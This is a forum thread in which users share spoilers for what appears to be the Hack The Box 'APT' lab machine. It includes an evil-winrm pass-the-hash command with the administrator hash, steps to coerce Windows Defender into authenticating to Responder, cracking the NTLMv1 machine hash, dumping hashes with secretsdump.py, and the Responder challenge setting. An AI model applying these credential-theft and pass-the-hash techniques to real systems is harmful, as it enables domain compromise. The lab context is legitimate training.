[vegetakasapa]

1) add "dead:beef::b885:d62a:d679:573f apt.htb" to /etc/hosts
2) run "sudo gem install evil-winrm" 
3) finally execute "evil-winrm -i apt.htb -u administrator -H c370bddf384a691d811ff3495e8a72e2"


bhoom u will get the admin shell :) 

if u feel helpful please donate Hidden Content

You must register or login to view this content.

[davedk]

1) add "dead:beef::b885:d62a:d679:573f apt.htb" to /etc/hosts
2) run "sudo gem install evil-winrm" 
3) finally execute "evil-winrm -i apt.htb -u administrator -H c370bddf384a691d811ff3495e8a72e2"


bhoom u will get the admin shell :) 

[Hidden Content]

How did you get the administrator hash

[lingling40hrs]

It's a long process but.
1) u have to leak the hash of machine user(APT$) using responder and WindowsDefender
2) crack the hash using crack.sh
3) use secretsdump.py to dump other hashes using that machine user hash
4) u will get this hash.

[jarvis4321]

Thanks! Would donate, but don't have enough to do :(

---

Btw how did you get defender to try to authenticate to your machine? running MpCmdRun.exe was denied.

[jarvis4321]

Got the command working and see the smb traffic on my box, but for some reason responder isn't giving me any hashes and can't seem to figure out what is wrong

[jarvis4321]

Got the command working and see the smb traffic on my box, but for some reason responder isn't giving me any hashes and can't seem to figure out what is wrong

Just in case someone is wondering, for some reason scantype needs to be set correctly for the hash to be sent as well as the setting in responder

[parapride]

It's a long process but.
1) u have to leak the hash of machine user(APT$) using responder and WindowsDefender
2) crack the hash using crack.sh
3) use secretsdump.py to dump other hashes using that machine user hash
4) u will get this hash.

Is there a way that you can crack the hash without having to pay for it at crack.sh?

[moriartus]

It's a long process but.
1) u have to leak the hash of machine user(APT$) using responder and WindowsDefender
2) crack the hash using crack.sh
3) use secretsdump.py to dump other hashes using that machine user hash
4) u will get this hash.

Is there a way that you can crack the hash without having to pay for it at crack.sh?

Hi there! I was afraid of the same thing, but crack.sh will crack the NTLMv1 for free...you just need to enter it in per their instructions, enter your email, and it will be sent to you. For me, I received their completed email in around 5-10 minutes after submission.

[howto123]

Hidden Content

You must register or login to view this content.

[EddieFlagg]

It's a long process but.
1) u have to leak the hash of machine user(APT$) using responder and WindowsDefender
2) crack the hash using crack.sh
3) use secretsdump.py to dump other hashes using that machine user hash
4) u will get this hash.

Is there a way that you can crack the hash without having to pay for it at crack.sh?

You need to set your "Challenge" in responder to the magic value for it to be free.

### Setup
So, you may or may not have already done this. In your responder conf, for the cracks to be "free", you need to set your challenge id to the magic value. This is in `/etc/responder/Responder.conf`.

Set it as:
```
; Custom challenge
Challenge = 1122334455667788

```